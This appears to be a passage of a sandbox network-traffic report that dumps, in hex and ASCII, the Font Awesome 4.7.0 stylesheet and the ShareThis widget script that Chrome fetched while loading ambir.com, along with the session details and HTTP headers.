                                                                                                                                                                                              2024-11-20 20:28:15 UTC892INData Raw: 37 64 64 34 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2f 2a 20 46 4f 4e 54 20 50 41 54 48 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 46 6f 6e 74 41 77 65 73
                                                                                                                                                                                              Data Ascii: 7dd4/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) *//* FONT PATH * -------------------------- */@font-face { font-family: 'FontAwes
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 69 61 6c 69 61 73 65 64 3b 0a 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 7d 0a 2f 2a 20 6d 61 6b 65 73 20 74 68 65 20 66 6f 6e 74 20 33 33 25 20 6c 61 72 67 65 72 20 72 65 6c 61 74 69 76 65 20 74 6f 20 74 68 65 20 69 63 6f 6e 20 63 6f 6e 74 61 69 6e 65 72 20 2a 2f 0a 2e 66 61 2d 6c 67 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 33 33 33 33 33 33 33 33 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 2e 37 35 65 6d 3b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 31 35 25 3b 0a 7d 0a 2e 66 61 2d 32 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 7d 0a 2e 66 61 2d 33 78 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 65 6d 3b 0a 7d
                                                                                                                                                                                              Data Ascii: ialiased; -moz-osx-font-smoothing: grayscale;}/* makes the font 33% larger relative to the icon container */.fa-lg { font-size: 1.33333333em; line-height: 0.75em; vertical-align: -15%;}.fa-2x { font-size: 2em;}.fa-3x { font-size: 3em;}
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 35 39 64 65 67 29
                                                                                                                                                                                              Data Ascii: nsform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); }}@keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg)
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6c 69 70 2d 76 65 72 74 69 63 61 6c 20 7b 0a 20 20 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 66 61 2d 73 74 61 63 6b 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 77 69 64 74 68 3a 20 32 65 6d 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 7d 0a 2e 66 61 2d 73 74 61 63 6b 2d 31 78 2c 0a 2e 66 61 2d 73 74 61 63 6b 2d 32 78 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 74 65 78 74 2d 61 6c
                                                                                                                                                                                              Data Ascii: lip-vertical { filter: none;}.fa-stack { position: relative; display: inline-block; width: 2em; height: 2em; line-height: 2em; vertical-align: middle;}.fa-stack-1x,.fa-stack-2x { position: absolute; left: 0; width: 100%; text-al
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 30 31 33 22 3b 0a 7d 0a 2e 66 61 2d 74 72 61 73 68 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 34 22 3b 0a 7d 0a 2e 66 61 2d 68 6f 6d 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 35 22 3b 0a 7d 0a 2e 66 61 2d 66 69 6c 65 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 36 22 3b 0a 7d 0a 2e 66 61 2d 63 6c 6f 63 6b 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 37 22 3b 0a 7d 0a 2e 66 61 2d 72 6f 61 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 38 22 3b 0a 7d 0a 2e 66 61 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 39
                                                                                                                                                                                              Data Ascii: 013";}.fa-trash-o:before { content: "\f014";}.fa-home:before { content: "\f015";}.fa-file-o:before { content: "\f016";}.fa-clock-o:before { content: "\f017";}.fa-road:before { content: "\f018";}.fa-download:before { content: "\f019
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 33 34 22 3b 0a 7d 0a 2e 66 61 2d 74 65 78 74 2d 77 69 64 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 35 22 3b 0a 7d 0a 2e 66 61 2d 61 6c 69 67 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 36 22 3b 0a 7d 0a 2e 66 61 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 37 22 3b 0a 7d 0a 2e 66 61 2d 61 6c 69 67 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 38 22 3b 0a 7d 0a 2e 66 61 2d 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 39 22 3b 0a 7d 0a 2e 66 61 2d 6c 69 73 74 3a 62 65 66
                                                                                                                                                                                              Data Ascii: 34";}.fa-text-width:before { content: "\f035";}.fa-align-left:before { content: "\f036";}.fa-align-center:before { content: "\f037";}.fa-align-right:before { content: "\f038";}.fa-align-justify:before { content: "\f039";}.fa-list:bef
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6e 74 65 6e 74 3a 20 22 5c 66 30 35 33 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 34 22 3b 0a 7d 0a 2e 66 61 2d 70 6c 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 35 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 6e 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 36 22 3b 0a 7d 0a 2e 66 61 2d 74 69 6d 65 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 37 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 38 22 3b
                                                                                                                                                                                              Data Ascii: ntent: "\f053";}.fa-chevron-right:before { content: "\f054";}.fa-plus-circle:before { content: "\f055";}.fa-minus-circle:before { content: "\f056";}.fa-times-circle:before { content: "\f057";}.fa-check-circle:before { content: "\f058";
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 37 32 22 3b 0a 7d 0a 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 37 33 22 3b 0a 7d 0a 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 37 34 22 3b 0a 7d 0a 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 37 35 22 3b 0a 7d 0a 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 37 36 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 37 37 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e
                                                                                                                                                                                              Data Ascii: 72";}.fa-calendar:before { content: "\f073";}.fa-random:before { content: "\f074";}.fa-comment:before { content: "\f075";}.fa-magnet:before { content: "\f076";}.fa-chevron-up:before { content: "\f077";}.fa-chevron-down:before { con
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 32 22 3b 0a 7d 0a 2e 66 61 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 33 22 3b 0a 7d 0a 2e 66 61 2d 6c 65 6d 6f 6e 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 34 22 3b 0a 7d 0a 2e 66 61 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 35 22 3b 0a 7d 0a 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 36 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 37 22 3b 0a 7d 0a
                                                                                                                                                                                              Data Ascii: -square:before { content: "\f092";}.fa-upload:before { content: "\f093";}.fa-lemon-o:before { content: "\f094";}.fa-phone:before { content: "\f095";}.fa-square-o:before { content: "\f096";}.fa-bookmark-o:before { content: "\f097";}
                                                                                                                                                                                              2024-11-20 20:28:16 UTC1369INData Raw: 20 22 5c 66 30 62 31 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 73 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 62 32 22 3b 0a 7d 0a 2e 66 61 2d 67 72 6f 75 70 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 75 73 65 72 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 63 30 22 3b 0a 7d 0a 2e 66 61 2d 63 68 61 69 6e 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 63 31 22 3b 0a 7d 0a 2e 66 61 2d 63 6c 6f 75 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 63 32 22 3b 0a 7d 0a 2e 66 61 2d 66 6c 61 73 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 63 33 22 3b 0a
                                                                                                                                                                                              Data Ascii: "\f0b1";}.fa-arrows-alt:before { content: "\f0b2";}.fa-group:before,.fa-users:before { content: "\f0c0";}.fa-chain:before,.fa-link:before { content: "\f0c1";}.fa-cloud:before { content: "\f0c2";}.fa-flask:before { content: "\f0c3";


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.54972013.227.8.54431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:15 UTC534OUTGET /js/sharethis.js HTTP/1.1
                                                                                                                                                                                              Host: platform-api.sharethis.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:16 UTC599INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 210640
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Edge-control: cache-maxage=60m,downstream-ttl=60m
                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                              Cache-Control: max-age=600, public
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:25:01 GMT
                                                                                                                                                                                              ETag: W/"336d0-g/6wprihOkYe7HpMswOVDodT6lU"
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                                                              Via: 1.1 ba38368c2b2437f314bbc0ee51e6632e.cloudfront.net (CloudFront)
                                                                                                                                                                                              X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                              X-Amz-Cf-Id: jdAds7H0KIL33GTE4ZFRYPovML3emuWCKXUV-paXoWGGBFl1RuaPjA==
                                                                                                                                                                                              Age: 194
                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                              2024-11-20 20:28:16 UTC8949INData Raw: 69 66 20 28 21 44 61 74 65 2e 6e 6f 77 29 20 7b 0a 20 20 44 61 74 65 2e 6e 6f 77 20 3d 20 66 75 6e 63 74 69 6f 6e 20 6e 6f 77 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 0a 20 20 7d 3b 0a 7d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 66 75 6e 63 4e 61 6d 65 2c 20 62 61 73 65 4f 62 6a 29 20 7b 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2f 20 54 68 65 20 70 75 62 6c 69 63 20 66 75 6e 63 74 69 6f 6e 20 6e 61 6d 65 20 64 65 66 61 75 6c 74 73 20 74 6f 20 77 69 6e 64 6f 77 2e 64 6f 63 52 65 61 64 79 0a 20 20 2f 2f 20 62 75 74 20 79 6f 75 20 63 61 6e 20 6d 6f 64 69 66 79 20 74 68 65 20 6c 61 73 74 20 6c 69 6e 65 20 6f 66 20 74 68 69 73 20 66 75 6e 63 74 69 6f 6e 20 74 6f 20 70 61 73
                                                                                                                                                                                              Data Ascii: if (!Date.now) { Date.now = function now() { return new Date().getTime(); };}(function(funcName, baseObj) { "use strict"; // The public function name defaults to window.docReady // but you can modify the last line of this function to pas
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 6d 65 72 63 65 2c 20 68 61 73 5f 6c 64 6a 73 6f 6e 2c 20 68 61 73 5f 6f 67 2c 20 68 61 73 5f 70 72 69 63 65 3b 0a 20 20 20 20 68 61 73 5f 6c 64 6a 73 6f 6e 20 3d 20 73 74 2e 6d 65 74 61 5b 22 40 74 79 70 65 22 5d 20 3d 3d 3d 20 22 50 72 6f 64 75 63 74 22 3b 0a 20 20 20 20 68 61 73 5f 6f 67 20 3d 20 73 74 2e 6d 65 74 61 5b 22 6f 67 3a 74 79 70 65 22 5d 20 3d 3d 3d 20 22 70 72 6f 64 75 63 74 22 3b 0a 20 20 20 20 68 61 73 5f 70 72 69 63 65 20 3d 20 73 74 2e 67 65 74 4d 65 74 61 28 5b 27 6f 67 3a 70 72 69 63 65 3a 61 6d 6f 75 6e 74 27 2c 20 27 70 72 69 63 65 27 2c 20 27 70 72 6f 64 75 63 74 3a 70 72 69 63 65 3a 61 6d 6f 75 6e 74 27 5d 29 3b 0a 20 20 20 20 69 66 20 28 68 61 73 5f 6c 64 6a 73 6f 6e 20 7c 7c 20 68 61 73 5f 6f 67 20 7c 7c 20 68 61 73 5f 70 72 69
                                                                                                                                                                                              Data Ascii: merce, has_ldjson, has_og, has_price; has_ldjson = st.meta["@type"] === "Product"; has_og = st.meta["og:type"] === "product"; has_price = st.getMeta(['og:price:amount', 'price', 'product:price:amount']); if (has_ldjson || has_og || has_pri
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 20 28 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 3d 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 3d 20 73 74 2e 67 65 74 44 65 73 63 72 69 70 74 69 6f 6e 28 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 64 61 74 61 2e 75 61 20 3d 20 28 72 65 66 20 3d 20 73 74 2e 75 61 5f 66 69 65 6c 64 73 29 20 21 3d 20 6e 75 6c 6c 20 3f 20 72 65 66 2e 75 61 20 3a 20 76 6f 69 64 20 30 3b 0a 20 20 20 20 20 20 64 61 74 61 2e 75 61 5f 66 75 6c 6c 5f 76 65 72 73 69 6f 6e 5f 6c 69 73 74 20 3d 20 28 72 65 66 31 20 3d 20 73 74 2e 75 61 5f 66 69 65 6c 64 73 29 20 21 3d 20 6e 75 6c 6c 20 3f 20 72 65 66 31 2e 75 61 5f 66 75 6c 6c 5f 76 65 72 73 69 6f 6e 5f 6c 69 73 74 20 3a 20 76 6f 69 64 20 30 3b 0a 20 20 20
                                                                                                                                                                                              Data Ascii: (data.description == null) { data.description = st.getDescription(); } data.ua = (ref = st.ua_fields) != null ? ref.ua : void 0; data.ua_full_version_list = (ref1 = st.ua_fields) != null ? ref1.ua_full_version_list : void 0;
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 20 20 20 6d 65 64 69 61 3a 20 69 6d 61 67 65 2c 0a 20 20 20 20 20 20 20 20 75 72 6c 3a 20 73 68 61 72 65 5f 75 72 6c 0a 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 70 6c 75 72 6b 3a 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6c 75 72 6b 2e 63 6f 6d 2f 3f 22 20 2b 20 73 74 2e 71 73 28 7b 0a 20 20 20 20 20 20 20 20 71 75 61 6c 69 66 69 65 72 3a 20 27 73 68 61 72 65 73 27 2c 0a 20 20 20 20 20 20 20 20 73 74 61 74 75 73 3a 20 73 68 61 72 65 5f 75 72 6c 0a 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 71 7a 6f 6e 65 3a 20 22 68 74 74 70 3a 2f 2f 73 6e 73 2e 71 7a 6f 6e 65 2e 71 71 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 71 7a 73 68 61 72 65 2f 63 67 69 5f 71 7a 73 68 61 72 65 5f 6f 6e 65 6b 65 79 3f 22 20 2b 20 73 74 2e 71 73 28 7b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: media: image, url: share_url }), plurk: "http://www.plurk.com/?" + st.qs({ qualifier: 'shares', status: share_url }), qzone: "http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?" + st.qs({
                                                                                                                                                                                              2024-11-20 20:28:16 UTC6570INData Raw: 67 29 7c 64 62 74 65 7c 64 63 5c 2d 73 7c 64 65 76 69 7c 64 69 63 61 7c 64 6d 6f 62 7c 64 6f 28 63 7c 70 29 6f 7c 64 73 28 31 32 7c 5c 2d 64 29 7c 65 6c 28 34 39 7c 61 69 29 7c 65 6d 28 6c 32 7c 75 6c 29 7c 65 72 28 69 63 7c 6b 30 29 7c 65 73 6c 38 7c 65 7a 28 5b 34 2d 37 5d 30 7c 6f 73 7c 77 61 7c 7a 65 29 7c 66 65 74 63 7c 66 6c 79 28 5c 2d 7c 5f 29 7c 67 31 20 75 7c 67 35 36 30 7c 67 65 6e 65 7c 67 66 5c 2d 35 7c 67 5c 2d 6d 6f 7c 67 6f 28 5c 2e 77 7c 6f 64 29 7c 67 72 28 61 64 7c 75 6e 29 7c 68 61 69 65 7c 68 63 69 74 7c 68 64 5c 2d 28 6d 7c 70 7c 74 29 7c 68 65 69 5c 2d 7c 68 69 28 70 74 7c 74 61 29 7c 68 70 28 20 69 7c 69 70 29 7c 68 73 5c 2d 63 7c 68 74 28 63 28 5c 2d 7c 20 7c 5f 7c 61 7c 67 7c 70 7c 73 7c 74 29 7c 74 70 29 7c 68 75 28 61 77 7c 74
                                                                                                                                                                                              Data Ascii: g)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|t
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 62 65 64 2d 74 77 69 74 74 65 72 27 2c 0a 20 20 20 20 27 2e 65 6d 62 65 64 6c 79 2d 63 61 72 64 27 2c 0a 20 20 20 20 27 2e 66 62 2d 70 6f 73 74 27 2c 0a 20 20 20 20 27 2e 66 62 2d 76 69 64 65 6f 27 2c 0a 20 20 20 20 27 2e 69 6e 73 74 61 67 72 61 6d 2d 6d 65 64 69 61 27 2c 0a 20 20 20 20 27 2e 72 65 64 64 69 74 27 2c 0a 20 20 20 20 27 2e 72 65 64 64 69 74 2d 63 61 72 64 27 2c 0a 20 20 20 20 27 2e 72 6d 2d 73 68 6f 72 74 63 6f 64 65 27 2c 0a 20 20 20 20 27 2e 73 70 6f 74 69 66 79 27 2c 0a 20 20 20 20 27 2e 74 75 6d 62 6c 72 2d 65 6d 62 65 64 27 2c 0a 20 20 20 20 27 2e 74 77 69 74 74 65 72 2d 65 6d 62 65 64 27 2c 0a 20 20 20 20 27 2e 74 77 69 74 74 65 72 2d 66 6f 6c 6c 6f 77 27 2c 0a 20 20 20 20 27 2e 74 77 69 74 74 65 72 2d 74 77 65 65 74 27 2c 0a 20 20 20
                                                                                                                                                                                              Data Ascii: bed-twitter', '.embedly-card', '.fb-post', '.fb-video', '.instagram-media', '.reddit', '.reddit-card', '.rm-shortcode', '.spotify', '.tumblr-embed', '.twitter-embed', '.twitter-follow', '.twitter-tweet',
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 6d 67 28 27 77 6f 72 64 70 72 65 73 73 2e 73 76 67 27 29 2c 0a 20 20 20 20 78 69 6e 67 3a 20 69 6d 67 28 27 78 69 6e 67 2e 73 76 67 27 29 2c 0a 20 20 20 20 79 61 68 6f 6f 6d 61 69 6c 3a 20 69 6d 67 28 27 79 61 68 6f 6f 6d 61 69 6c 2e 73 76 67 27 29 2c 0a 20 20 20 20 79 65 6c 70 3a 20 69 6d 67 28 27 79 65 6c 70 2e 73 76 67 27 29 2c 0a 20 20 20 20 79 6f 75 74 75 62 65 3a 20 69 6d 67 28 27 79 6f 75 74 75 62 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 79 75 6d 6d 6c 79 3a 20 69 6d 67 28 27 79 75 6d 6d 6c 79 2e 73 76 67 27 29 2c 0a 20 20 20 20 7a 69 6c 6c 6f 77 3a 20 69 6d 67 28 27 7a 69 6c 6c 6f 77 2e 73 76 67 27 29 2c 0a 20 20 20 20 7a 6f 6d 61 74 6f 3a 20 69 6d 67 28 27 7a 6f 6d 61 74 6f 2e 73 76 67 27 29 0a 20 20 7d 3b 0a 0a 20 20 77 69 6e 64 6f 77 2e 5f 5f 73
                                                                                                                                                                                              Data Ascii: mg('wordpress.svg'), xing: img('xing.svg'), yahoomail: img('yahoomail.svg'), yelp: img('yelp.svg'), youtube: img('youtube.svg'), yummly: img('yummly.svg'), zillow: img('zillow.svg'), zomato: img('zomato.svg') }; window.__s
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 63 34 63 34 63 3b 5c 6e 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 5c 6e 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 7a 2d 69 6e 64 65 78 3a 20 33 30 3b 5c 6e 7d 5c 6e 23 22 20 2b 20 69 64 20 2b 20 22 20 2e 73 74 2d 63 6c 6f 73 65 20 7b 5c 6e 20 20 22 20 2b 20 28 73 74 2e 42 4f 52 44 45 52 5f 52 41 44 49 55 53 28 32 38 29 29 20 2b 20 22 5c 6e 20 20 22 20 2b 20 73 74 2e 42 4f 52 44 45 52 5f 42 4f 58 20 2b 20 22 5c 6e 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 5c 6e 20 20 62 6f 74 74 6f 6d 3a 20 32 38 70 78 3b 5c 6e 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 5c
